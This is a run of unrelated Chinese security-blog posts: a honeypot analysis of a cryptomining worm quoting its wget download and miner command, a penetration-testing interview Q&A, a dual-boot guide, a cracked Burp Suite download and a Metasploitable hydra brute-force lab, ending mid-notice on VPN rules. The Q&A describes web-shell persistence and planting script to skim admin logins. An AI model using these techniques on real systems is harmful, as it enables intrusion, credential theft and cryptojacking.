给大家分享网络空间里发家致富的一个野路子：蠕虫挖矿，套比特币等虚拟货币。下面这是我们捕获到的真实案例，门开了一条缝，更多的请自行探索，以免有带坏嫌疑。

---

今天凌晨，我们的蜜网系统跳出了个有趣的字符串：

[email protected]

ProtonMail！前段时间我们的分享（推荐安全且匿名的邮箱 ProtonMail）似乎暗示着某种巧合，这不得不引起我们的兴趣。意料之内，匿名是把双刃剑，剑的另一端，“匿名之恶”会让人性丑恶发挥到极致。

以前我说过，黑暗森林法则同样适用于这个网络空间：被发现即被干掉。不好意思，这次是我们“干掉”了对方。

上面这个字符串完整内容是：

(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x &> /dev/null &)

我简单解释下这条 Bash 命令：

1.

exec，负责执行后面的命令，细节用途自行查阅。

2.

/var/tmp/.war/1，这个文件由下面这条命令创建：

wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1

3.

1 == minerd

4.

minerd 之后的参数：

-a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

目测和比特币等这类货币的挖矿有关，因为：minergate.com 就是这样的邪恶挖矿大平台。合法存在。

5.

&> /dev/null

无视标准输出与错误输出。

6.

最后的 &，表示这条命令放到后台执行。

7.

最外层的小括号()，表示创建一个新的 Shell。

上面的7点解释，重点看第4点就好。

为了确定我们的“目测”，我们用我们唯一的官方邮箱“[email protected]”同样在 minergate.com 上注册了个账号。在这个平台深度体验一番，不得不感慨，挖矿的世界真是眼花缭乱，满地宝藏既视感。

这个平台上，我们发现下面这个挖矿说明链接：

https://minergate.com/altminers/cpuminer-multi-wolf

部分区域截图如下：

红框里的内容是：

minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

对比下上面的第4点，这下确定了吧？另外，这个 minerd 本身还是开源的...你可以根据自己的特殊要求修改编译。

好，回到开头，这个蠕虫其实不是什么新鲜玩意，传播的主要方式是通过 Linux 服务器的弱口令及一些漏洞（比如：Redis 那个未授权访问缺陷）。

这个蠕虫感染一万台服务器，那么就有一万个挖矿节点...

别说运用什么 0day，就是用到一些上古时代的技术，我们也能在这个健壮又脆弱的网络空间里成为“有钱人”。

还好，我们不是坏人。

---

这个案例够清晰吧？还想看到更多的吗？经过“懒人在思考”的白话润色，保证你即使不懂技术，也能涨姿势。

网络空间，这个巨型大脑，真美...

注:转载自余玄大大的微信公众号

以前，我们一直想寻找安全靠谱的邮箱服务，Gmail 是首选，原因主要有几个：

1. Google 这个大品牌的背书

   
   

2. 安全确实做得很好，关于这点我们尤其在意前端安全是否做得足够，比如对抗 XSS/CSRF 的策略，这在邮箱攻击里是常用的手法。另外在很多安全细节上很具备前瞻性，如：全域 HTTPS 策略、Cookie 策略、内容分离策略、账号风控策略、图片安全策略、恶意内容对抗策略、等等

   
   

3. 漏洞奖金计划很良心，基本是这种风气的鼻祖

这次，我们推荐的 ProtonMail 邮箱，虽然我们不能保证上面几点达到 Gmail 的层级，但是整体来说，我们还是觉得挺靠谱的，尤其有下面这几个特点。

1. 开源，这点就已经让人多少放心些

   
   

2. 点对点加密策略，这种对称加密算法几乎可以完美对抗中间人劫持（MITM），包括对 PGP 的支持，在我们看来也是一种很漂亮的方案

   
   

3. 注册再也不需要你的个人任何隐私，比如手机号，这意味着，几乎完全一个匿名邮件是可以的

   
   

4. 服务器坐落在瑞士，一个重视隐私且中立的国家，法律这方面很有保障，服务器的安全建设等级据说也很高

   
   

5. 你可以选择是否开启更强的登陆日志记录，默认不会记录 IP

   
   

6. 也有不错的漏洞奖金计划

   
   

7. 在安全性上，对比我们上面提到 Gmail 的做法，ProtonMail 的做法更加让我们感到惊讶，这种做法能感受到 ProtonMail 在安全及隐私这方面的极致态度。我们这先不展开，因为我们计划去夺一轮漏洞奖金再说

   
   

8. 支持 TOR 网络下的邮件服务，这下真可以做到完全匿名了。不要和我们提黑天鹅事件，我们懂

   
   

9. 有对应移动端的 App

   
   

10. 用户体验也是 ProtonMail 的极致追求

    
    

11. 免费，但是你可以付费得到更好的服务，比如可以自定义域名，如果你想支持 ProtonMail 发展得更好，可以付费升级，也可以捐助

    
    

12. 斯诺登也有在用这个服务...

    
    

13. 创始团队出自大名鼎鼎的 CERN（欧洲核子研究组织），科学家，怪不得命名了 ProtonMail(质子邮箱)，TED 及 Wikipedia 上可以看到他们的介绍，包括演讲

之前，我们确实有犹豫是否推荐这个邮箱服务，你们知道，有些东西并不是越多人知道越好，尤其是我朝特殊的情况。但我们相信，进化的步伐是永远不会停止的，我们不需要作恶，但是我们至少需要知道如何对抗很多藏在阴暗处的作恶。

我们这篇推荐不是在给 ProtonMail 做背书，是否使用，看你。

希望 ProtonMail 越来越好，也希望这个互联网越来越好。

ProtanMail 官网：

https://protonmail.com/

TOR地址:https://protonirockerxow.onion/。

注:转载自余玄大大的微信公众号

1.拿到一个待检测的站，你觉得应该先做什么？

• 收集信息
  whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...

2.mysql的网站注入，5.0以上和5.0以下有什么区别？

• 5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。

• 5.0以下是多用户单操作，5.0以上是多用户多操做。

3.在渗透过程中，收集目标站注册人邮箱对我们有什么价值？

• 丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台。

• 用邮箱做关键词进行丢进搜索引擎。

• 利用搜索到的关联信息找出其他邮进而得到常用社交账号。

• 社工找出社交账号，里面或许会找出管理员设置密码的习惯 。

• 利用已有信息生成专用字典。

• 观察管理员常逛哪些非大众性网站，拿下它，你会得到更多好东西。

4.判断出网站的CMS对渗透有什么意义？

• 查找网上已曝光的程序漏洞。

• 如果开源，还能下载相对应的源码进行代码审计。

5.一个成熟并且相对安全的CMS，渗透时扫目录的意义？

• 敏感文件、二级目录扫描

• 站长的误操作比如：网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

6.常见的网站服务器容器。

• IIS、Apache、nginx、Lighttpd、Tomcat

7.mysql注入点，用工具对目标站直接写入一句话，需要哪些条件？

• root权限以及网站的绝对路径。

8.目前已知哪些版本的容器有解析漏洞，具体举例。

• IIS 6.0
  /xx.asp/xx.jpg "xx.asp"是文件夹名

• IIS 7.0/7.5
  默认Fast-CGI开启，直接在url中图片地址后面输入/1.php，会把正常图片当成php解析

• Nginx
  版本小于等于0.8.37，利用方法和IIS 7.0/7.5一样，Fast-CGI关闭情况下也可利用。
空字节代码 xxx.jpg%00.php

• Apache
  上传的文件命名为：test.php.x1.x2.x3，Apache是从右往左判断后缀

• lighttpd
  xx.jpg/xx.php，不全,请小伙伴们在评论处不吝补充，谢谢！

9.如何手工快速判断目标站是windows还是linux服务器？

• linux大小写敏感,windows大小写不敏感。

10.为何一个mysql数据库的站，只有一个80端口开放？

• 更改了端口，没有扫描出来。

• 站库分离。

• 3306端口不对外开放

11.3389无法连接的几种情况。

• 没开放3389 端口

• 端口被修改

• 防护拦截

• 处于内网(需进行端口转发)

12.如何突破注入时字符被转义？

• 宽字符注入

• hex编码绕过

13.在某后台新闻编辑界面看到编辑器，应该先做什么？

• 查看编辑器的名称版本,然后搜索公开的漏洞。

14.拿到一个webshell发现网站根目录下有.htaccess文件，我们能做什么？

• 能做的事情很多，用隐藏网马来举例子：
  插入
  <FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>
  .jpg文件会被解析成.php文件。

• 具体其他的事情，不好详说，建议大家自己去搜索语句来玩玩。

15.注入漏洞只能查账号密码？

• 只要权限广，拖库脱到老。

16.安全狗会追踪变量，从而发现出是一句话木马吗？

• 是根据特征码，所以很好绕过了，只要思路宽，绕狗绕到欢，但这应该不会是一成不变的。

17.access 扫出后缀为asp的数据库文件，访问乱码。如何实现到本地利用。

• 迅雷下载，直接改后缀为.mdb。

18.提权时选择可读写目录，为何尽量不用带空格的目录？

• 因为exp执行多半需要空格界定参数

19.某服务器有站点A,B 为何在A的后台添加test用户，访问B的后台。发现也添加上了test用户？

• 同数据库。

20.注入时可以不使用and 或or 或xor，直接order by 开始注入吗？

• and/or/xor，前面的1=1、1=2步骤只是为了判断是否为注入点，如果已经确定是注入点那就可以省那步骤去。

21:某个防注入系统，在注入时会提示：

 系统检测到你有非法注入的行为。
 已记录您的ip xx.xx.xx.xx
 时间:2016:01-23
 提交页面:test.asp?id=15
 提交内容:and 1=1

如何利用这个防注入系统拿shell？

• 在URL里面直接提交一句话，这样网站就把你的一句话也记录进数据库文件了 这个时候可以尝试寻找网站的配置文件 直接上菜刀链接。具体文章参见：http://ytxiao.lofter.com/post/40583a_ab36540。

22.上传大马后访问乱码时，有哪些解决办法？

• 浏览器中改编码。

23.审查上传点的元素有什么意义？

• 有些站点的上传文件类型的限制是在前端实现的，这时只要增加上传类型就能突破限制了。

24.目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？

• 先爆破用户名，再利用被爆破出来的用户名爆破密码。

• 其实有些站点，在登陆处也会这样提示

• 所有和数据库有交互的地方都有可能有注入。

25.目标站发现某txt的下载地址为http://www.test.com/down/down.php?file=/upwdown/1.txt，你有什么思路？

• 这就是传说中的下载漏洞！在file=后面尝试输入index.php下载他的首页文件，然后在首页文件里继续查找其他网站的配置文件，可以找出网站的数据库密码和数据库的地址。

26.甲给你一个目标站，并且告诉你根目录下存在/abc/目录，并且此目录下存在编辑器和admin目录。请问你的想法是？

• 直接在网站二级目录/abc/下扫描敏感文件及目录。

27.在有shell的情况下，如何使用xss实现对目标站的长久控制？

• 后台登录处加一段记录登录账号密码的js，并且判断是否登录成功，如果登录成功，就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。

• 在登录后才可以访问的文件中插入XSS脚本。

28.后台修改管理员密码处，原密码显示为*。你觉得该怎样实现读出这个用户的密码？

• 审查元素 把密码处的password属性改成text就明文显示了

29.目标站无防护，上传图片可以正常访问，上传脚本格式访问则403.什么原因？

• 原因很多，有可能web服务器配置把上传目录写死了不执行相应脚本，尝试改后缀名绕过

30.审查元素得知网站所使用的防护软件，你觉得怎样做到的？

• 在敏感操作被拦截，通过界面信息无法具体判断是什么防护的时候，F12看HTML体部 比如护卫神就可以在名称那看到<hws>内容<hws>。

31.在win2003服务器中建立一个 .zhongzi文件夹用意何为？

• 隐藏文件夹，为了不让管理员发现你传上去的工具。

32、sql注入有以下两个测试选项，选一个并且阐述不选另一个的理由： 

A. demo.jsp?id=2+1       B. demo.jsp?id=2-1 
选B，在 URL 编码中 + 代表空格，可能会造成混淆

33、以下链接存在 sql 注入漏洞，对于这个变形注入，你有什么思路？ 

demo.do?DATA=AjAxNg== 
DATA有可能经过了 base64 编码再传入服务器，所以我们也要对参数进行 base64 编码才能正确完成测试

34、发现 demo.jsp?uid=110 注入点，你有哪几种思路获取 webshell，哪种是优选？ 

有写入权限的，构造联合查询语句使用using INTO OUTFILE，可以将查询的输出重定向到系统的文件中，这样去写入 WebShell 
使用 sqlmap –os-shell 原理和上面一种相同，来直接获得一个 Shell，这样效率更高 
通过构造联合查询语句得到网站管理员的账户和密码，然后扫后台登录后台，再在后台通过改包上传等方法上传 Shell

35、CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？ 

XSS是跨站脚本攻击，用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。修复方式：对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。 

CSRF是跨站请求伪造攻击，XSS是实现CSRF的诸多手段中的一种，是由于没有在关键操作执行时进行是否由用户自愿发起的确认。修复方式：筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer 
XXE是XML外部实体注入攻击，XML中可以通过调用实体来请求本地或者远程内容，和远程文件保护类似，会引发相关安全问题，例如敏感文件读取。修复方式：XML解析库在调用时严格禁止对外部实体的解析。

36、CSRF、SSRF和重放攻击有什么区别？ 

CSRF是跨站请求伪造攻击，由客户端发起 
SSRF是服务器端请求伪造，由服务器发起 
重放攻击是将截获的数据包进行重放，达到身份认证等目的

37、说出至少三种业务逻辑漏洞，以及修复方式？ 

密码找回漏洞中存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码 
身份认证漏洞中最常见的是会话固定攻击和 Cookie 仿冒，只要得到 Session 或 Cookie 即可伪造用户身份 
验证码漏洞中存在验证码允许暴力破解、验证码可以通过 Javascript 或者改包的方法来进行绕过

38、圈出下面会话中可能存在问题的项，并标注可能会存在的问题？

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world” 
HTTP/1.1Host:*******.com:82User-Agent:Mozilla/ 5.0 Firefox/40Accept:text/css,*/*;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://*******.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive 

39、找一类你最擅长的漏洞，谈下绕过漏洞修复后的方案？

40、你常用的渗透工具有哪些，最常用的是哪个？

41、描述一个你深入研究过的 CVE 或 POC。

42、谈谈你经常关注的安全平台？

吾爱破解论坛从2008年3月13日建立以来，陪伴众多坛友走过了9年艰辛而辉煌的风雨历程，以带领新手走入密界大门为基础，汇集了一大批爱好者在此栖息，今天我们依然坚持我们的初衷，希望在起到承上启下的作用，带领爱好者们走入密界的圣殿。

我们在官方微信和微博收到很多朋友发来的消息，想加入论坛学习交流逆向分析技术，为了让论坛融入更多的新生血液，值此周年之际，吾爱破解论坛管理团队经过商议决定周年当天限时开放注册。

开放注册时间:2017年3月13日  12：00 -- 14：00 和  20：00 -- 22：00

点击注册 得CB

前言:转载这篇文章主要是因为以下几点原因:

1. 我的这篇博文主要是在硬盘分区为mbr+bios(更多gpt+mbr介绍点我)启动的情况下安装的Kali.详情:https://mrxn.net/Linux/363.html 
2. 这就导致后来很多同学通过搜索引擎搜索win10+Kali双系统来到那片文章,跟着操作,最后出现了不能添加引导的问题,在此表示抱歉.
3. 关于easybcd出现一下的提示:

   EFI Bootloader Detected! EasyBCD has detected that your machine is currently booting in EFI mode. Due to limitations set by Microsoft, many of EasyBCD’s multi-booting features cannot be used in EFI mode and have been disabled. Press ‘OK’ to continue or ‘Help’ to read more about these limitations and possible workarounds.

如图所示,在添加linux引导这里是灰色的不可选状态,easybcd的官方介绍看这里: EasyBCD and UEFI ,翻译过来的大致意思就是说:

检测到EFI引导的启动程序! EasyBCD已检测到您的机器是目前在EFI引导模式。由于微软设定的限制,许多EasyBCD其中的特性不能用于EFI模式,已经被禁用。 按“OK”继续或“帮助”来了解更多关于这些限制和可能的解决方法。

easybcd官方的意思大概是这样的:

起因缘由：

微软已经禁止加载遗留或非Windows操作系统从BCD菜单。这意味着你不能再使用easybcd添加Windows 9x，XP或Server 2003项BCD启动菜单。你也不能添加DOS，Linux，BSD，或MAC条目。你可以添加多个Windows Vista、Windows 7、Windows 8、Windows 10和条目；也可以引导到BCD型便携式媒体，如WinPE 2 +图像。

easybcd 100% UEFI的准备。在UEFI模式，多easybcd的功能将被禁用的安全您遵守限制微软放在bootloader，将阻止任何试图加载非微软签核（包括chainloaders）从顶层BCD菜单，它将创造100%项符合UEFI的其他安装Windows操作系统在你的电脑。这些限制都是不存在的不足easybcd也不能轻易绕过，他们已经到位，微软。

解决方法如下：

1 禁用uefi模式（分区模式转为非gpt格式）

2 使用虚拟机安装（这个当然纯属废话）

3 使用grub2 EFI作为你主要的启动管理器

详解如下

大多数个人电脑和笔记本电脑目前航运和使用UEFI固件和程序可以被配置为禁用UEFI完全相反，回到“遗产”引导模式。两个单独的步骤往往需要充分实现；我们有视觉引导和样本图像取自更常见的UEFI配置页面文件：

UEFI引导模式使传统PC

禁用安全启动

这些步骤不关闭UEFI（这是不可能的，因为那是你的主板运行），但他们却使你开机进入Windows传统的方式（通过MBR）。不过，您的Windows安装已在UEFI、GPT模式，和Windows UEFI启动装置无法通过传统MBR的方法！你需要的格式（确保完全重新初始化磁盘摆脱GPT）并重新安装Windows，或使用其他实用工具易回收的要领它可以将您现有的安装被引导在UEFI BIOS / GPT和MBR模式/地方，而不会丢失任何数据。执行一个单一的“自动修复”运行在easyre足以使您的Windows安装启动遗留/ MBR模式以及EFI / GPT模式。你可能需要给传统BIOS加载方式优先于你的BIOS设置/配置UEFI（负载遗产第一”）。

选项2：使用 虚拟机

随着近年来虚拟化技术的改进，运行另一个操作系统不再是痛苦（或几个，因为这件事）在一个虚拟机来代替双启动。使用任何流行的、免费的虚拟化软件Windows虚拟PC ，VirtualBox，或VMware服务器它可以安装Linux，旧版本的Windows、DOS等操作系统在一个所谓的“虚拟机”的外观和行为像一个电脑，但运行在桌面上的窗口–没有重新启动所需的–让你同时运行两个操作系统。这种方法是完全兼容的（独立的）MBR / UEFI的问题，并且应该在最现代的机器做工精细。在旧的机器或机器的内存限制的金额（在4或8钩），这是一个繁重的工作量，为您的PC，然而。

选项3：使用grub2 EFI作为你主要的启动管理器

easybcd控制Windows的启动菜单，历来被用作主要的启动管理器。与easybcd，可以添加条目为Linux和Windows的老顶层BCD菜单看到当你的机器第一靴版本。由于Windows启动管理器在UEFI模式下运行不支持传统的和非微软的操作系统的加载，另一种选择是可能的。

安装Linux或具有其自己的Bootloader船舶其他任何第三方的操作系统时，不要选择安装GRUB引导扇区是传统时，选择使用easybcd控制你的启动菜单，选择安装GRUB到MBR（或盘，在这种情况下），使它的主要启动你的电脑。您可以添加Windows启动菜单的grub2 EFI启动菜单–在这种情况下，你会看到GRUB的启动菜单时，你的电脑开始，从那里你可以选择Windows。你仍然可以使用easybcd控制Windows的启动菜单和设置多的靴子，再在BCD启动菜单配置Vista +条目，但与grub2 EFI菜单加载，你可以用它来启动到Linux和chainload NTLDR开机进入Windows 9x。

注:以上为机器翻译,大致看懂就行了,我也没去翻译成国语的那种语法模式,很累,我又懒! 

至于怎么看自己的机器是否为mbr或者是gpt,知道的就不说了,不知道的下载一个easybcd不就知道了:) https://pan.baidu.com/s/1c201R8G(easybcd2.3)

---

我刚刚又看了一遍我的文章,我写了安装引导到主mbr上,和官方的第三种方式类似啊!算了,我不甩锅,这锅我背了....下面开始正式的介绍 

在UEFI+GPT下使用rEFind实现Win10 + Kali2.0 双引导吧:

---

一、Win10和Kali2.0的安装：

1.Win10安装以及激活：

    关于Win10的安装我就不再这里赘述，激活工具呢，kms之类的也有很多。

2.Kali2.0安装：

    a.这个是kali2.0官网的下载地址：https://www.kali.org/downloads/，我下载的是64位的完整版。

    b.然后我使用了UltraISO的写入硬盘映像功能，将kali2.0的ISO写入到U盘中

    c.插上做好的启动U盘，调整启动首选项为USB，不同的电脑，会有不同修改方式，这个请自己百度之。

    d.安装的步骤没有差别，只是需要在安装GRUB的时候，我们要停下来，然后跳过GRUB引导安装。

    e.等待安装完成，重启后进入Windows系统 

二、rEFind的安装以及双引导实现：

    本部分最大的特点就是，你无须进入PE系统即可完成对于rEFind的安装和双引导的实现，就在Win下就可以了,相关工具软件下载：

软碟通UltraISO v9.5.3.2901 简体中文完美注册版  http://www.linuxidc.com/Linux/2012-11/74577.htm

DiskGenius 4.6.5 正式版发布下载  http://www.linuxidc.com/Linux/2014-10/108329.htm

BOOTICE: 引导扇区维护工具下载：  http://www.linuxidc.com/Linux/2011-04/34185.htm

rEFind 到Linux公社资源站下载：

------------------------------------------分割线------------------------------------------

免费下载地址在 http://linux.linuxidc.com/

用户名与密码都是www.linuxidc.com

具体下载目录在 /2016年资料/7月/29日/在UEFI+GPT下使用rEFind实现Win10 + Kali2.0 双引导/

下载方法见 http://www.linuxidc.com/Linux/2013-07/87684.htm

------------------------------------------分割线------------------------------------------

一共四个工具（UltraISO是上个步骤用到的，实际上这步只用到其他的三个）；

    说了一大堆其实都是废话，现在进入正题：

1.rEFind的安装：

    首先，打开DiskGenius,然后找到ESP分区也就是我们的EFi引导分区，右键选择“指派新的驱动器号（盘符）”

然后，你任意选择一个就可以了。

我选择了Z:

然后确定，指派成功喽！

 

    然后继续进入ESP中，打开EFI文件夹，

然后在空白区右键，新建一个文件，命名为rEFind！

双击进入rEFind文件夹，我们开始搬文件了！

解压refind.zip

创建一个文件，仿照refind.conf-sample写一个文件，命名为refind.conf.

不会写也没关系，建个空文件也行，但是必须要有refind.conf，否者启动会报错，为了美观一点吧。

将里面的文件逐个放入，

注意：由于软件功能的限制，遇到文件夹时只能手动创建，文件倒是可以一次搬一个目录的

截图如下：

注意文件夹中的文件也要搬进来哦！

 

下边该使用另外一款工具了，名字叫BOOTICE

解压后你会发现有两个文件，一个是64位版本一个是32位版本，我是64位所以选择BOOTICEx64.exe，打开看到软件界面：

我们选择UEFI：

选择修改启动序列：

点击添加：

在这里直接输入路径：

当然这个也要看你一开始指派的盘符了,我之前指派的是Z:所以就是Z:\EFI\rEFind；

然后由于我是64位所以选择，

然后点击打开：

提示成功后，

修改菜单标题：

我修改成了rEFind，点击上移，

直到最顶端：

点击"保存当前启动设置(S)",

然后点击关闭。

重启你的计算机，

然后就能愉快的UEFI+GPT的模式下愉快的使用Win10和Kali2.0了。

3.小结

总结下，我这个教程的关键是使用rEFind来接管系统的启动，所以并没有安装grub！

本文永久更新链接地址：http://www.linuxidc.com/Linux/2016-07/133717.htm

注:转载以方便更多初入门的小白同学,少走弯路.我们下回见!

Burp Suite是一款信息安全从业人员必备的集 成型的渗透测试工具，它采用自动测试和半自动测试的方式，包含了 Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通 过拦截HTTP/HTTPS的web数据包，充当浏览器和相关应用程序的中间人，进行拦截、修改、重放数据包进行测试，是web安全人员的一把必备的瑞士军刀。

功能

• 拦截代理（Proxy），你可以检查和更改浏览器与目标应用程序间的流量；
• 可感知应用程序的网络爬虫（Spider），它能完整的枚举应用程序的内容和功能；
• 高级扫描器，执行后它能自动地发现web应用程序的安全漏洞；
• 入侵测试工具（Intruder），用于执行强大的定制攻击去发现及利用不同寻常的漏洞；
• 重放工具（Repeater），一个靠手动操作来触发单独的HTTP 请求，并分析应用程序响应的工具；
• 会话工具（Sequencer），用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具；
• 解码器，进行手动执行或对应用程序数据者智能解码编码的工具；
• 扩展性强，可以让你加载Burp Suite的扩展，使用你自己的或第三方代码来扩展Burp Suit的功能。

1.7.12更新内容

• SMTP interactions
• SMTP external service interaction
• SMTP header injection
• private Burp Collaborator server

具体更新内容参见：http://releases.portswigger.net/2016/11/1712.html

由于11版本有卡顿情况与未知bug问题，特此更新一个12版本.

下载地址

---

网盘下载: https://pan.baidu.com/s/1dFj4VoH 

本地下载: burpsuite_pro_v1.7.12.zip (解压密码:mrxn,感谢@Larry_Lau 大牛的分享).

Kali渗透测试演练Metasploitable靶机

准备工作：

l VM虚拟机（http://www.vmware.com/cn.html）

l Kali（https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/）

l Metasploitable靶机（https://sourceforge.net/projects/metasploitable/）

l 要求Kali和靶机在同一个Lan段

在开始工作前都确认一一下是否在同一个Lan段，分别登录Kali和靶机使用ifconfig 命令查看

注意：Metasploitable的默认账号、密码是：msfadmin:msfadmin，Kali的默认是root:toor

第一阶段：扫描阶段，工具 namp 

命令：隐蔽扫描：nmap -sS 192.168.209.138

端口爆破：FTP、SSH等

工具：Hydra

备用字典：

l 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt ftp://192.168.209.138

l 爆破ssh

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt 192.168.209.138 ssh

通过23端口telnet登录进系统

图片过多,我就不一一上传了,都在文档里面,主要包括以下的测试列表,初学者可以测试体验:

• 端口爆破：FTP、SSH等
• 利用metasploit进行端口渗透等
• 8180——-Apache Tomcat弱口令等

Kali渗透测试演练Metasploitable靶机.docx 

百度网盘链接: https://pan.baidu.com/s/1o8HcuAA 有什么问题的可以留言或者是邮件

乌云_vmware_201606

上周末就看到工信部的公告了:工信部：未经批准不得自建或租用VPN,只是一直没有时间来写,刚好今天把https折腾好了,选择了Let's encrypt.有我慢慢道来.

以下是通知全文：

工业和信息化部关于清理规范互联网网络接入服务市场的通知

工信部信管函[2017]32号

各省、自治区、直辖市通信管理局，中国信息通信研究院，中国电信集团公司、中国移动通信集团公司、中国联合网络通信集团有限公司、中国广播电视网络有限公司、中信网络有限公司，各互联网数据中心业务经营者、互联网接入服务业务经营者、内容分发网络业务经营者：

近年来，网络信息技术日新月异，云计算、大数据等应用蓬勃发展，我国互联网网络接入服务市场面临难得的发展机遇，但无序发展的苗头也随之显现，亟需整治规范。为进一步规范市场秩序，强化网络信息安全管理，促进互联网行业健康有序发展，工业和信息化部决定自即日起至2018年3月31日，在全国范围内对互联网网络接入服务市场开展清理规范工作。现将有关事项通知如下：

一、目标任务

依法查处互联网数据中心（IDC）业务、互联网接入服务（ISP）业务和内容分发网络（CDN）业务市场存在的无证经营、超范围经营、“层层转租”等违法行为，切实落实企业主体责任，加强经营许可和接入资源的管理，强化网络信息安全管理，维护公平有序的市场秩序，促进行业健康发展。

二、工作重点

（一）加强资质管理，查处非法经营

1. 各通信管理局要对本辖区内提供IDC、ISP、CDN业务的企业情况进行摸底调查，杜绝以下非法经营行为：

（1）无证经营。即企业未取得相应的电信业务经营许可证，在当地擅自开展IDC、ISP、CDN等业务。

（2）超地域范围经营。即企业持有相应的电信业务经营许可证，业务覆盖地域不包括本地区，却在当地部署IDC机房及服务器，开展ISP接入服务等。

（3）超业务范围经营。即企业持有电信业务经营许可证，但超出许可的业务种类在当地开展IDC、ISP、CDN等业务。

（4）转租转让经营许可证。即持有相应的电信业务经营许可证的企业，以技术合作等名义向无证企业非法经营电信业务提供资质或资源等的违规行为。

2. 在《电信业务分类目录（2015年版）》实施前已持有IDC许可证的企业，若实际已开展互联网资源协作服务业务或CDN业务，应在2017年3月31日之前，向原发证机关书面承诺在2017年年底前达到相关经营许可要求，并取得相应业务的电信经营许可证。

未按期承诺的，自2017年4月1日起，应严格按照其经营许可证规定的业务范围开展经营活动，不得经营未经许可的相关业务。未按承诺如期取得相应电信业务经营许可的，自2018年1月1日起，不得经营该业务。

（二）严格资源管理，杜绝违规使用

各基础电信企业、互联网网络接入服务企业对网络基础设施和IP地址、带宽等网络接入资源的使用情况进行全面自查，切实整改以下问题：

1. 网络接入资源管理不到位问题。各基础电信企业应加强线路资源管理，严格审核租用方资质和用途，不得向无相应电信业务经营许可的企业和个人提供用于经营IDC、ISP、CDN等业务的网络基础设施和IP地址、带宽等网络接入资源。

2. 违规自建或使用非法资源问题。IDC、ISP、CDN企业不得私自建设通信传输设施，不得使用无相应电信业务经营许可资质的单位或个人提供的网络基础设施和IP地址、带宽等网络接入资源。

3. 层层转租问题。IDC、ISP企业不得将其获取的IP地址、带宽等网络接入资源转租给其他企业，用于经营IDC、ISP等业务。

4. 违规开展跨境业务问题。未经电信主管部门批准，不得自行建立或租用专线（含虚拟专用网络VPN）等其他信道开展跨境经营活动。基础电信企业向用户出租的国际专线，应集中建立用户档案，向用户明确使用用途仅供其内部办公专用，不得用于连接境内外的数据中心或业务平台开展电信业务经营活动。

（三）落实相关要求，夯实管理基础

贯彻落实《工业和信息化部关于进一步规范因特网数据中心（IDC）业务和因特网接入服务（ISP）业务市场准入工作的通告》（工信部电管函[2012]552号，以下简称《通告》）关于资金、人员、场地、设施、技术方案和信息安全管理的要求，强化事前、事中、事后全流程管理。

1. 2012年12月1日前取得IDC、ISP许可证的企业，应参照《通告》关于资金、人员、场地、设施、技术方案和信息安全管理等方面的要求，建设相关系统，通过评测，并完成系统对接工作。

当前尚未达到相关要求的企业，应在2017年3月31日之前，向原发证机关书面承诺在2017年年底前达到相关要求，通过评测，并完成系统对接工作。未按期承诺或者未按承诺如期通过评测完成系统对接工作的，各通信管理局应当督促相应企业整改。

其中，各相关企业应按照《关于切实做好互联网信息安全管理系统建设与对接工作的通知》、《关于通报全国增值IDC/ISP企业互联网信息安全管理系统对接情况的函》和《互联网信息安全管理系统使用及运行管理办法（试行）》（工信厅网安〔2016〕135号）要求，按期完成互联网信息安全管理系统建设、测评及系统对接工作。未按期完成的，企业2017年电信业务经营许可证年检不予通过。

2. 新申请IDC（互联网资源协作服务）业务经营许可证的企业需建设ICP/IP地址/域名信息备案系统、企业接入资源管理平台、信息安全管理系统，落实IDC机房运行安全和网络信息安全要求，并通过相关评测。

3. 新申请CDN业务经营许可证的企业需建设ICP/IP地址/域名信息备案系统、企业接入资源管理平台、信息安全管理系统，落实网络信息安全要求，并通过相关评测。

4. 现有持证IDC企业申请扩大业务覆盖范围或在原业务覆盖范围新增机房、业务节点的，需要在新增范围内达到《通告》关于IDC机房运行安全和网络信息安全管理的要求，并通过相关评测。

5. 现有持证ISP（含网站接入）企业申请扩大业务覆盖范围的，需要在新增业务覆盖地区内达到《通告》关于网络信息安全管理的要求，并通过相关评测。

6. 现有持证CDN企业申请扩大业务覆盖范围或在原业务覆盖范围增加带宽、业务节点的，需要在新增范围内达到《通告》关于网络信息安全管理的要求，并通过相关评测。

三、保障措施

（一）政策宣贯引导，做好咨询服务

各通信管理局要利用各种方式做好政策宣贯和解读工作，公布电话受理相关举报和解答企业问题咨询,引导企业按照要求合法开展经营活动。中国信息通信研究院要做好相关评测支撑工作，协助部和各通信管理局做好政策宣贯、举报受理、企业问题解答等工作。

